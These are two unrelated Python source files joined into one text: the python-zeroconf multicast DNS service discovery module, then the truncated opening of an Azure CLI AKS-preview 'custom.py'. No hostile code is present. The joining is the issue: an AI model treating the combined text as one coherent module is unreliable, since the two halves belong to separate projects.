This module provides a framework for the use of DNS Service Discovery
using IP multicast.
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301
USA
"""
import asyncio
import itertools
import logging
import random
import socket
import sys
import threading
from types import TracebackType # noqa # used in type hints
from typing import Awaitable, Dict, List, Optional, Tuple, Type, Union, cast
from ._cache import DNSCache
from ._dns import DNSQuestion, DNSQuestionType
from ._exceptions import NonUniqueNameException, NotRunningException
from ._handlers import (
MulticastOutgoingQueue,
QueryHandler,
RecordManager,
construct_outgoing_multicast_answers,
construct_outgoing_unicast_answers,
)
from ._history import QuestionHistory
from ._logger import QuietLogger, log
from ._protocol.incoming import DNSIncoming
from ._protocol.outgoing import DNSOutgoing
from ._services import ServiceListener
from ._services.browser import ServiceBrowser
from ._services.info import ServiceInfo, instance_name_from_service_info
from ._services.registry import ServiceRegistry
from ._updates import RecordUpdate, RecordUpdateListener
from ._utils.asyncio import (
await_awaitable,
get_running_loop,
run_coro_with_timeout,
shutdown_loop,
wait_event_or_timeout,
)
from ._utils.name import service_type_name
from ._utils.net import (
IPVersion,
InterfaceChoice,
InterfacesType,
autodetect_ip_version,
can_send_to,
create_sockets,
)
from ._utils.time import current_time_millis, millis_to_seconds
from .const import (
_CACHE_CLEANUP_INTERVAL,
_CHECK_TIME,
_CLASS_IN,
_CLASS_UNIQUE,
_FLAGS_AA,
_FLAGS_QR_QUERY,
_FLAGS_QR_RESPONSE,
_MAX_MSG_ABSOLUTE,
_MDNS_ADDR,
_MDNS_ADDR6,
_MDNS_PORT,
_ONE_SECOND,
_REGISTER_TIME,
_STARTUP_TIMEOUT,
_TYPE_PTR,
_UNREGISTER_TIME,
)
_TC_DELAY_RANDOM_INTERVAL = (400, 500)
# The maximum amont of time to delay a multicast
# response in order to aggregate answers
_AGGREGATION_DELAY = 500 # ms
# The maximum amont of time to delay a multicast
# response in order to aggregate answers after
# it has already been delayed to protect the network
# from excessive traffic. We use a shorter time
# window here as we want to _try_ to answer all
# queries in under 1350ms while protecting
# the network from excessive traffic to ensure
# a service info request with two questions
# can be answered in the default timeout of
# 3000ms
_PROTECTED_AGGREGATION_DELAY = 200 # ms
_CLOSE_TIMEOUT = 3000 # ms
_REGISTER_BROADCASTS = 3
class AsyncEngine:
"""An engine wraps sockets in the event loop."""
def __init__(
self,
zeroconf: 'Zeroconf',
listen_socket: Optional[socket.socket],
respond_sockets: List[socket.socket],
) -> None:
self.loop: Optional[asyncio.AbstractEventLoop] = None
self.zc = zeroconf
self.protocols: List[AsyncListener] = []
self.readers: List[asyncio.DatagramTransport] = []
self.senders: List[asyncio.DatagramTransport] = []
self.running_event: Optional[asyncio.Event] = None
self._listen_socket = listen_socket
self._respond_sockets = respond_sockets
self._cleanup_timer: Optional[asyncio.TimerHandle] = None
def setup(self, loop: asyncio.AbstractEventLoop, loop_thread_ready: Optional[threading.Event]) -> None:
"""Set up the instance."""
self.loop = loop
self.running_event = asyncio.Event()
self.loop.create_task(self._async_setup(loop_thread_ready))
async def _async_setup(self, loop_thread_ready: Optional[threading.Event]) -> None:
"""Set up the instance."""
assert self.loop is not None
self._cleanup_timer = self.loop.call_later(
millis_to_seconds(_CACHE_CLEANUP_INTERVAL), self._async_cache_cleanup
)
await self._async_create_endpoints()
assert self.running_event is not None
self.running_event.set()
if loop_thread_ready:
loop_thread_ready.set()
async def _async_create_endpoints(self) -> None:
"""Create endpoints to send and receive."""
assert self.loop is not None
loop = self.loop
reader_sockets = []
sender_sockets = []
if self._listen_socket:
reader_sockets.append(self._listen_socket)
for s in self._respond_sockets:
if s not in reader_sockets:
reader_sockets.append(s)
sender_sockets.append(s)
for s in reader_sockets:
transport, protocol = await loop.create_datagram_endpoint(lambda: AsyncListener(self.zc), sock=s)
self.protocols.append(cast(AsyncListener, protocol))
self.readers.append(cast(asyncio.DatagramTransport, transport))
if s in sender_sockets:
self.senders.append(cast(asyncio.DatagramTransport, transport))
def _async_cache_cleanup(self) -> None:
"""Periodic cache cleanup."""
now = current_time_millis()
self.zc.question_history.async_expire(now)
self.zc.record_manager.async_updates(
now, [RecordUpdate(record, None) for record in self.zc.cache.async_expire(now)]
)
self.zc.record_manager.async_updates_complete()
assert self.loop is not None
self._cleanup_timer = self.loop.call_later(
millis_to_seconds(_CACHE_CLEANUP_INTERVAL), self._async_cache_cleanup
)
async def _async_close(self) -> None:
"""Cancel and wait for the cleanup task to finish."""
self._async_shutdown()
await asyncio.sleep(0) # flush out any call soons
assert self._cleanup_timer is not None
self._cleanup_timer.cancel()
def _async_shutdown(self) -> None:
"""Shutdown transports and sockets."""
for transport in itertools.chain(self.senders, self.readers):
transport.close()
def close(self) -> None:
"""Close from sync context.
While it is not expected during normal operation,
this function may raise EventLoopBlocked if the underlying
call to `_async_close` cannot be completed.
"""
assert self.loop is not None
# Guard against Zeroconf.close() being called from the eventloop
if get_running_loop() == self.loop:
self._async_shutdown()
return
if not self.loop.is_running():
return
run_coro_with_timeout(self._async_close(), self.loop, _CLOSE_TIMEOUT)
class AsyncListener(asyncio.Protocol, QuietLogger):
"""A Listener is used by this module to listen on the multicast
group to which DNS messages are sent, allowing the implementation
to cache information as it arrives.
It requires registration with an Engine object in order to have
the read() method called when a socket is available for reading."""
__slots__ = ('zc', 'data', 'last_time', 'transport', 'sock_description', '_deferred', '_timers')
def __init__(self, zc: 'Zeroconf') -> None:
self.zc = zc
self.data: Optional[bytes] = None
self.last_time: float = 0
self.transport: Optional[asyncio.DatagramTransport] = None
self.sock_description: Optional[str] = None
self._deferred: Dict[str, List[DNSIncoming]] = {}
self._timers: Dict[str, asyncio.TimerHandle] = {}
super().__init__()
def suppress_duplicate_packet(self, data: bytes, now: float) -> bool:
"""Suppress duplicate packet if the last one was the same in the last second."""
if self.data == data and (now - 1000) < self.last_time:
return True
self.data = data
self.last_time = now
return False
def datagram_received(
self, data: bytes, addrs: Union[Tuple[str, int], Tuple[str, int, int, int]]
) -> None:
assert self.transport is not None
v6_flow_scope: Union[Tuple[()], Tuple[int, int]] = ()
data_len = len(data)
if len(addrs) == 2:
# https://github.com/python/mypy/issues/1178
addr, port = addrs # type: ignore
scope = None
else:
# https://github.com/python/mypy/issues/1178
addr, port, flow, scope = addrs # type: ignore
log.debug('IPv6 scope_id %d associated to the receiving interface', scope)
v6_flow_scope = (flow, scope)
now = current_time_millis()
if self.suppress_duplicate_packet(data, now):
# Guard against duplicate packets
log.debug(
'Ignoring duplicate message received from %r:%r [socket %s] (%d bytes) as [%r]',
addr,
port,
self.sock_description,
data_len,
data,
)
return
if data_len > _MAX_MSG_ABSOLUTE:
# Guard against oversized packets to ensure bad implementations cannot overwhelm
# the system.
log.debug(
"Discarding incoming packet with length %s, which is larger "
"than the absolute maximum size of %s",
data_len,
_MAX_MSG_ABSOLUTE,
)
return
msg = DNSIncoming(data, (addr, port), scope, now)
if msg.valid:
log.debug(
'Received from %r:%r [socket %s]: %r (%d bytes) as [%r]',
addr,
port,
self.sock_description,
msg,
data_len,
data,
)
else:
log.debug(
'Received from %r:%r [socket %s]: (%d bytes) [%r]',
addr,
port,
self.sock_description,
data_len,
data,
)
return
if not msg.is_query():
self.zc.handle_response(msg)
return
self.handle_query_or_defer(msg, addr, port, self.transport, v6_flow_scope)
def handle_query_or_defer(
self,
msg: DNSIncoming,
addr: str,
port: int,
transport: asyncio.DatagramTransport,
v6_flow_scope: Union[Tuple[()], Tuple[int, int]] = (),
) -> None:
"""Deal with incoming query packets. Provides a response if
possible."""
if not msg.truncated:
self._respond_query(msg, addr, port, transport, v6_flow_scope)
return
deferred = self._deferred.setdefault(addr, [])
# If we get the same packet we ignore it
for incoming in reversed(deferred):
if incoming.data == msg.data:
return
deferred.append(msg)
delay = millis_to_seconds(random.randint(*_TC_DELAY_RANDOM_INTERVAL))
assert self.zc.loop is not None
self._cancel_any_timers_for_addr(addr)
self._timers[addr] = self.zc.loop.call_later(
delay, self._respond_query, None, addr, port, transport, v6_flow_scope
)
def _cancel_any_timers_for_addr(self, addr: str) -> None:
"""Cancel any future truncated packet timers for the address."""
if addr in self._timers:
self._timers.pop(addr).cancel()
def _respond_query(
self,
msg: Optional[DNSIncoming],
addr: str,
port: int,
transport: asyncio.DatagramTransport,
v6_flow_scope: Union[Tuple[()], Tuple[int, int]] = (),
) -> None:
"""Respond to a query and reassemble any truncated deferred packets."""
self._cancel_any_timers_for_addr(addr)
packets = self._deferred.pop(addr, [])
if msg:
packets.append(msg)
self.zc.handle_assembled_query(packets, addr, port, transport, v6_flow_scope)
def error_received(self, exc: Exception) -> None:
"""Likely socket closed or IPv6."""
# We preformat the message string with the socket as we want
# log_exception_once to log a warrning message once PER EACH
# different socket in case there are problems with multiple
# sockets
msg_str = f"Error with socket {self.sock_description}): %s"
self.log_exception_once(exc, msg_str, exc)
def connection_made(self, transport: asyncio.BaseTransport) -> None:
self.transport = cast(asyncio.DatagramTransport, transport)
sock_name = self.transport.get_extra_info('sockname')
sock_fileno = self.transport.get_extra_info('socket').fileno()
self.sock_description = f"{sock_fileno} ({sock_name})"
def connection_lost(self, exc: Optional[Exception]) -> None:
"""Handle connection lost."""
def async_send_with_transport(
log_debug: bool,
transport: asyncio.DatagramTransport,
packet: bytes,
packet_num: int,
out: DNSOutgoing,
addr: Optional[str],
port: int,
v6_flow_scope: Union[Tuple[()], Tuple[int, int]] = (),
) -> None:
s = transport.get_extra_info('socket')
ipv6_socket = s.family == socket.AF_INET6
if addr is None:
real_addr = _MDNS_ADDR6 if ipv6_socket else _MDNS_ADDR
else:
real_addr = addr
if not can_send_to(ipv6_socket, real_addr):
return
if log_debug:
log.debug(
'Sending to (%s, %d) via [socket %s (%s)] (%d bytes #%d) %r as %r...',
real_addr,
port or _MDNS_PORT,
s.fileno(),
transport.get_extra_info('sockname'),
len(packet),
packet_num + 1,
out,
packet,
)
# Get flowinfo and scopeid for the IPV6 socket to create a complete IPv6
# address tuple: https://docs.python.org/3.6/library/socket.html#socket-families
if ipv6_socket and not v6_flow_scope:
_, _, sock_flowinfo, sock_scopeid = s.getsockname()
v6_flow_scope = (sock_flowinfo, sock_scopeid)
transport.sendto(packet, (real_addr, port or _MDNS_PORT, *v6_flow_scope))
class Zeroconf(QuietLogger):
"""Implementation of Zeroconf Multicast DNS Service Discovery
Supports registration, unregistration, queries and browsing.
"""
def __init__(
self,
interfaces: InterfacesType = InterfaceChoice.All,
unicast: bool = False,
ip_version: Optional[IPVersion] = None,
apple_p2p: bool = False,
) -> None:
"""Creates an instance of the Zeroconf class, establishing
multicast communications, listening and reaping threads.
:param interfaces: :class:`InterfaceChoice` or a list of IP addresses
(IPv4 and IPv6) and interface indexes (IPv6 only).
IPv6 notes for non-POSIX systems:
* `InterfaceChoice.All` is an alias for `InterfaceChoice.Default`
on Python versions before 3.8.
Also listening on loopback (``::1``) doesn't work, use a real address.
:param ip_version: IP versions to support. If `choice` is a list, the default is detected
from it. Otherwise defaults to V4 only for backward compatibility.
:param apple_p2p: use AWDL interface (only macOS)
"""
if ip_version is None:
ip_version = autodetect_ip_version(interfaces)
self.done = False
if apple_p2p and sys.platform != 'darwin':
raise RuntimeError('Option `apple_p2p` is not supported on non-Apple platforms.')
self.unicast = unicast
listen_socket, respond_sockets = create_sockets(interfaces, unicast, ip_version, apple_p2p=apple_p2p)
log.debug('Listen socket %s, respond sockets %s', listen_socket, respond_sockets)
self.engine = AsyncEngine(self, listen_socket, respond_sockets)
self.browsers: Dict[ServiceListener, ServiceBrowser] = {}
self.registry = ServiceRegistry()
self.cache = DNSCache()
self.question_history = QuestionHistory()
self.query_handler = QueryHandler(self.registry, self.cache, self.question_history)
self.record_manager = RecordManager(self)
self.notify_event: Optional[asyncio.Event] = None
self.loop: Optional[asyncio.AbstractEventLoop] = None
self._loop_thread: Optional[threading.Thread] = None
self._out_queue = MulticastOutgoingQueue(self, 0, _AGGREGATION_DELAY)
self._out_delay_queue = MulticastOutgoingQueue(self, _ONE_SECOND, _PROTECTED_AGGREGATION_DELAY)
self.start()
def start(self) -> None:
"""Start Zeroconf."""
self.loop = get_running_loop()
if self.loop:
self.notify_event = asyncio.Event()
self.engine.setup(self.loop, None)
return
self._start_thread()
def _start_thread(self) -> None:
"""Start a thread with a running event loop."""
loop_thread_ready = threading.Event()
def _run_loop() -> None:
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.notify_event = asyncio.Event()
self.engine.setup(self.loop, loop_thread_ready)
self.loop.run_forever()
self._loop_thread = threading.Thread(target=_run_loop, daemon=True)
self._loop_thread.start()
loop_thread_ready.wait()
async def async_wait_for_start(self) -> None:
"""Wait for start up for actions that require a running Zeroconf instance.
Throws NotRunningException if the instance is not running or could
not be started.
"""
if self.done: # If the instance was shutdown from under us, raise immediately
raise NotRunningException
assert self.engine.running_event is not None
await wait_event_or_timeout(self.engine.running_event, timeout=_STARTUP_TIMEOUT)
if not self.engine.running_event.is_set() or self.done:
raise NotRunningException
@property
def listeners(self) -> List[RecordUpdateListener]:
return self.record_manager.listeners
async def async_wait(self, timeout: float) -> None:
"""Calling task waits for a given number of milliseconds or until notified."""
assert self.notify_event is not None
await wait_event_or_timeout(self.notify_event, timeout=millis_to_seconds(timeout))
def notify_all(self) -> None:
"""Notifies all waiting threads and notify listeners."""
assert self.loop is not None
self.loop.call_soon_threadsafe(self.async_notify_all)
def async_notify_all(self) -> None:
"""Schedule an async_notify_all."""
assert self.notify_event is not None
self.notify_event.set()
self.notify_event.clear()
def get_service_info(
self, type_: str, name: str, timeout: int = 3000, question_type: Optional[DNSQuestionType] = None
) -> Optional[ServiceInfo]:
"""Returns network's service information for a particular
name and type, or None if no service matches by the timeout,
which defaults to 3 seconds."""
info = ServiceInfo(type_, name)
if info.request(self, timeout, question_type):
return info
return None
def add_service_listener(self, type_: str, listener: ServiceListener) -> None:
"""Adds a listener for a particular service type. This object
will then have its add_service and remove_service methods called when
services of that type become available and unavailable."""
self.remove_service_listener(listener)
self.browsers[listener] = ServiceBrowser(self, type_, listener)
def remove_service_listener(self, listener: ServiceListener) -> None:
"""Removes a listener from the set that is currently listening."""
if listener in self.browsers:
self.browsers[listener].cancel()
del self.browsers[listener]
def remove_all_service_listeners(self) -> None:
"""Removes a listener from the set that is currently listening."""
for listener in list(self.browsers):
self.remove_service_listener(listener)
def register_service(
self,
info: ServiceInfo,
ttl: Optional[int] = None,
allow_name_change: bool = False,
cooperating_responders: bool = False,
) -> None:
"""Registers service information to the network with a default TTL.
Zeroconf will then respond to requests for information for that
service. The name of the service may be changed if needed to make
it unique on the network. Additionally multiple cooperating responders
can register the same service on the network for resilience
(if you want this behavior set `cooperating_responders` to `True`).
While it is not expected during normal operation,
this function may raise EventLoopBlocked if the underlying
call to `register_service` cannot be completed.
"""
assert self.loop is not None
run_coro_with_timeout(
await_awaitable(
self.async_register_service(info, ttl, allow_name_change, cooperating_responders)
),
self.loop,
_REGISTER_TIME * _REGISTER_BROADCASTS,
)
async def async_register_service(
self,
info: ServiceInfo,
ttl: Optional[int] = None,
allow_name_change: bool = False,
cooperating_responders: bool = False,
) -> Awaitable:
"""Registers service information to the network with a default TTL.
Zeroconf will then respond to requests for information for that
service. The name of the service may be changed if needed to make
it unique on the network. Additionally multiple cooperating responders
can register the same service on the network for resilience
(if you want this behavior set `cooperating_responders` to `True`)."""
if ttl is not None:
# ttl argument is used to maintain backward compatibility
# Setting TTLs via ServiceInfo is preferred
info.host_ttl = ttl
info.other_ttl = ttl
await self.async_wait_for_start()
await self.async_check_service(info, allow_name_change, cooperating_responders)
self.registry.async_add(info)
return asyncio.ensure_future(self._async_broadcast_service(info, _REGISTER_TIME, None))
def update_service(self, info: ServiceInfo) -> None:
"""Registers service information to the network with a default TTL.
Zeroconf will then respond to requests for information for that
service.
While it is not expected during normal operation,
this function may raise EventLoopBlocked if the underlying
call to `async_update_service` cannot be completed.
"""
assert self.loop is not None
run_coro_with_timeout(
await_awaitable(self.async_update_service(info)), self.loop, _REGISTER_TIME * _REGISTER_BROADCASTS
)
async def async_update_service(self, info: ServiceInfo) -> Awaitable:
"""Registers service information to the network with a default TTL.
Zeroconf will then respond to requests for information for that
service."""
self.registry.async_update(info)
return asyncio.ensure_future(self._async_broadcast_service(info, _REGISTER_TIME, None))
async def _async_broadcast_service(
self,
info: ServiceInfo,
interval: int,
ttl: Optional[int],
broadcast_addresses: bool = True,
) -> None:
"""Send a broadcasts to announce a service at intervals."""
for i in range(_REGISTER_BROADCASTS):
if i != 0:
await asyncio.sleep(millis_to_seconds(interval))
self.async_send(self.generate_service_broadcast(info, ttl, broadcast_addresses))
def generate_service_broadcast(
self,
info: ServiceInfo,
ttl: Optional[int],
broadcast_addresses: bool = True,
) -> DNSOutgoing:
"""Generate a broadcast to announce a service."""
out = DNSOutgoing(_FLAGS_QR_RESPONSE | _FLAGS_AA)
self._add_broadcast_answer(out, info, ttl, broadcast_addresses)
return out
def generate_service_query(self, info: ServiceInfo) -> DNSOutgoing: # pylint: disable=no-self-use
"""Generate a query to lookup a service."""
out = DNSOutgoing(_FLAGS_QR_QUERY | _FLAGS_AA)
# https://datatracker.ietf.org/doc/html/rfc6762#section-8.1
# Because of the mDNS multicast rate-limiting
# rules, the probes SHOULD be sent as "QU" questions with the unicast-
# response bit set, to allow a defending host to respond immediately
# via unicast, instead of potentially having to wait before replying
# via multicast.
#
# _CLASS_UNIQUE is the "QU" bit
out.add_question(DNSQuestion(info.type, _TYPE_PTR, _CLASS_IN | _CLASS_UNIQUE))
out.add_authorative_answer(info.dns_pointer(created=current_time_millis()))
return out
def _add_broadcast_answer( # pylint: disable=no-self-use
self,
out: DNSOutgoing,
info: ServiceInfo,
override_ttl: Optional[int],
broadcast_addresses: bool = True,
) -> None:
"""Add answers to broadcast a service."""
now = current_time_millis()
other_ttl = info.other_ttl if override_ttl is None else override_ttl
host_ttl = info.host_ttl if override_ttl is None else override_ttl
out.add_answer_at_time(info.dns_pointer(override_ttl=other_ttl, created=now), 0)
out.add_answer_at_time(info.dns_service(override_ttl=host_ttl, created=now), 0)
out.add_answer_at_time(info.dns_text(override_ttl=other_ttl, created=now), 0)
if broadcast_addresses:
for dns_address in info.dns_addresses(override_ttl=host_ttl, created=now):
out.add_answer_at_time(dns_address, 0)
def unregister_service(self, info: ServiceInfo) -> None:
"""Unregister a service.
While it is not expected during normal operation,
this function may raise EventLoopBlocked if the underlying
call to `async_unregister_service` cannot be completed.
"""
assert self.loop is not None
run_coro_with_timeout(
self.async_unregister_service(info), self.loop, _UNREGISTER_TIME * _REGISTER_BROADCASTS
)
async def async_unregister_service(self, info: ServiceInfo) -> Awaitable:
"""Unregister a service."""
self.registry.async_remove(info)
# If another server uses the same addresses, we do not want to send
# goodbye packets for the address records
entries = self.registry.async_get_infos_server(info.server)
broadcast_addresses = not bool(entries)
return asyncio.ensure_future(
self._async_broadcast_service(info, _UNREGISTER_TIME, 0, broadcast_addresses)
)
def generate_unregister_all_services(self) -> Optional[DNSOutgoing]:
"""Generate a DNSOutgoing goodbye for all services and remove them from the registry."""
service_infos = self.registry.async_get_service_infos()
if not service_infos:
return None
out = DNSOutgoing(_FLAGS_QR_RESPONSE | _FLAGS_AA)
for info in service_infos:
self._add_broadcast_answer(out, info, 0)
self.registry.async_remove(service_infos)
return out
async def async_unregister_all_services(self) -> None:
"""Unregister all registered services.
Unlike async_register_service and async_unregister_service, this
method does not return a future and is always expected to be
awaited since its only called at shutdown.
"""
# Send Goodbye packets https://datatracker.ietf.org/doc/html/rfc6762#section-10.1
out = self.generate_unregister_all_services()
if not out:
return
for i in range(_REGISTER_BROADCASTS):
if i != 0:
await asyncio.sleep(millis_to_seconds(_UNREGISTER_TIME))
self.async_send(out)
def unregister_all_services(self) -> None:
"""Unregister all registered services.
While it is not expected during normal operation,
this function may raise EventLoopBlocked if the underlying
call to `async_unregister_all_services` cannot be completed.
"""
assert self.loop is not None
run_coro_with_timeout(
self.async_unregister_all_services(), self.loop, _UNREGISTER_TIME * _REGISTER_BROADCASTS
)
async def async_check_service(
self, info: ServiceInfo, allow_name_change: bool, cooperating_responders: bool = False
) -> None:
"""Checks the network for a unique service name, modifying the
ServiceInfo passed in if it is not unique."""
instance_name = instance_name_from_service_info(info)
if cooperating_responders:
return
next_instance_number = 2
next_time = now = current_time_millis()
i = 0
while i < _REGISTER_BROADCASTS:
# check for a name conflict
while self.cache.current_entry_with_name_and_alias(info.type, info.name):
if not allow_name_change:
raise NonUniqueNameException
# change the name and look for a conflict
info.name = f'{instance_name}-{next_instance_number}.{info.type}'
next_instance_number += 1
service_type_name(info.name)
next_time = now
i = 0
if now < next_time:
await self.async_wait(next_time - now)
now = current_time_millis()
continue
self.async_send(self.generate_service_query(info))
i += 1
next_time += _CHECK_TIME
def add_listener(
self, listener: RecordUpdateListener, question: Optional[Union[DNSQuestion, List[DNSQuestion]]]
) -> None:
"""Adds a listener for a given question. The listener will have
its update_record method called when information is available to
answer the question(s).
This function is threadsafe
"""
assert self.loop is not None
self.loop.call_soon_threadsafe(self.record_manager.async_add_listener, listener, question)
def remove_listener(self, listener: RecordUpdateListener) -> None:
"""Removes a listener.
This function is threadsafe
"""
assert self.loop is not None
self.loop.call_soon_threadsafe(self.record_manager.async_remove_listener, listener)
def async_add_listener(
self, listener: RecordUpdateListener, question: Optional[Union[DNSQuestion, List[DNSQuestion]]]
) -> None:
"""Adds a listener for a given question. The listener will have
its update_record method called when information is available to
answer the question(s).
This function is not threadsafe and must be called in the eventloop.
"""
self.record_manager.async_add_listener(listener, question)
def async_remove_listener(self, listener: RecordUpdateListener) -> None:
"""Removes a listener.
This function is not threadsafe and must be called in the eventloop.
"""
self.record_manager.async_remove_listener(listener)
def handle_response(self, msg: DNSIncoming) -> None:
"""Deal with incoming response packets. All answers
are held in the cache, and listeners are notified."""
self.record_manager.async_updates_from_response(msg)
def handle_assembled_query(
self,
packets: List[DNSIncoming],
addr: str,
port: int,
transport: asyncio.DatagramTransport,
v6_flow_scope: Union[Tuple[()], Tuple[int, int]] = (),
) -> None:
"""Respond to a (re)assembled query.
If the protocol recieved packets with the TC bit set, it will
wait a bit for the rest of the packets and only call
handle_assembled_query once it has a complete set of packets
or the timer expires. If the TC bit is not set, a single
packet will be in packets.
"""
now = packets[0].now
ucast_source = port != _MDNS_PORT
question_answers = self.query_handler.async_response(packets, ucast_source)
if question_answers.ucast:
questions = packets[0].questions
id_ = packets[0].id
out = construct_outgoing_unicast_answers(question_answers.ucast, ucast_source, questions, id_)
# When sending unicast, only send back the reply
# via the same socket that it was recieved from
# as we know its reachable from that socket
self.async_send(out, addr, port, v6_flow_scope, transport)
if question_answers.mcast_now:
self.async_send(construct_outgoing_multicast_answers(question_answers.mcast_now))
if question_answers.mcast_aggregate:
self._out_queue.async_add(now, question_answers.mcast_aggregate)
if question_answers.mcast_aggregate_last_second:
# https://datatracker.ietf.org/doc/html/rfc6762#section-14
# If we broadcast it in the last second, we have to delay
# at least a second before we send it again
self._out_delay_queue.async_add(now, question_answers.mcast_aggregate_last_second)
def send(
self,
out: DNSOutgoing,
addr: Optional[str] = None,
port: int = _MDNS_PORT,
v6_flow_scope: Union[Tuple[()], Tuple[int, int]] = (),
transport: Optional[asyncio.DatagramTransport] = None,
) -> None:
"""Sends an outgoing packet threadsafe."""
assert self.loop is not None
self.loop.call_soon_threadsafe(self.async_send, out, addr, port, v6_flow_scope, transport)
def async_send(
self,
out: DNSOutgoing,
addr: Optional[str] = None,
port: int = _MDNS_PORT,
v6_flow_scope: Union[Tuple[()], Tuple[int, int]] = (),
transport: Optional[asyncio.DatagramTransport] = None,
) -> None:
"""Sends an outgoing packet."""
if self.done:
return
# If no transport is specified, we send to all the ones
# with the same address family
transports = [transport] if transport else self.engine.senders
log_debug = log.isEnabledFor(logging.DEBUG)
for packet_num, packet in enumerate(out.packets()):
if len(packet) > _MAX_MSG_ABSOLUTE:
self.log_warning_once("Dropping %r over-sized packet (%d bytes) %r", out, len(packet), packet)
return
for send_transport in transports:
async_send_with_transport(
log_debug, send_transport, packet, packet_num, out, addr, port, v6_flow_scope
)
def _close(self) -> None:
"""Set global done and remove all service listeners."""
if self.done:
return
self.remove_all_service_listeners()
self.done = True
def _shutdown_threads(self) -> None:
"""Shutdown any threads."""
self.notify_all()
if not self._loop_thread:
return
assert self.loop is not None
shutdown_loop(self.loop)
self._loop_thread.join()
self._loop_thread = None
def close(self) -> None:
"""Ends the background threads, and prevent this instance from
servicing further queries.
This method is idempotent and irreversible.
"""
assert self.loop is not None
if self.loop.is_running():
if self.loop == get_running_loop():
log.warning(
"unregister_all_services skipped as it does blocking i/o; use AsyncZeroconf with asyncio"
)
else:
self.unregister_all_services()
self._close()
self.engine.close()
self._shutdown_threads()
async def _async_close(self) -> None:
"""Ends the background threads, and prevent this instance from
servicing further queries.
This method is idempotent and irreversible.
This call only intended to be used by AsyncZeroconf
Callers are responsible for unregistering all services
before calling this function
"""
self._close()
await self.engine._async_close() # pylint: disable=protected-access
self._shutdown_threads()
def __enter__(self) -> 'Zeroconf':
return self
def __exit__( # pylint: disable=useless-return
self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType],
) -> Optional[bool]:
self.close()
return None
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
from math import isnan
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2020_09_01.models import (ContainerServiceLinuxProfile,
ManagedClusterWindowsProfile,
ContainerServiceNetworkProfile,
ManagedClusterServicePrincipalProfile,
ContainerServiceSshConfiguration,
ContainerServiceSshPublicKey,
ManagedCluster,
ManagedClusterAADProfile,
ManagedClusterAddonProfile,
ManagedClusterAgentPoolProfile,
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
ManagedClusterIdentity,
ManagedClusterAPIServerAccessProfile,
ManagedClusterSKU,
ManagedClusterIdentityUserAssignedIdentitiesValue)
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import get_msi_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._client_factory import cf_agent_pools
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type,
_set_outbound_type, _parse_comma_separated_list,
_trim_fqdn_name_containing_hcp)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_PREFIX, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import ADDONS
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
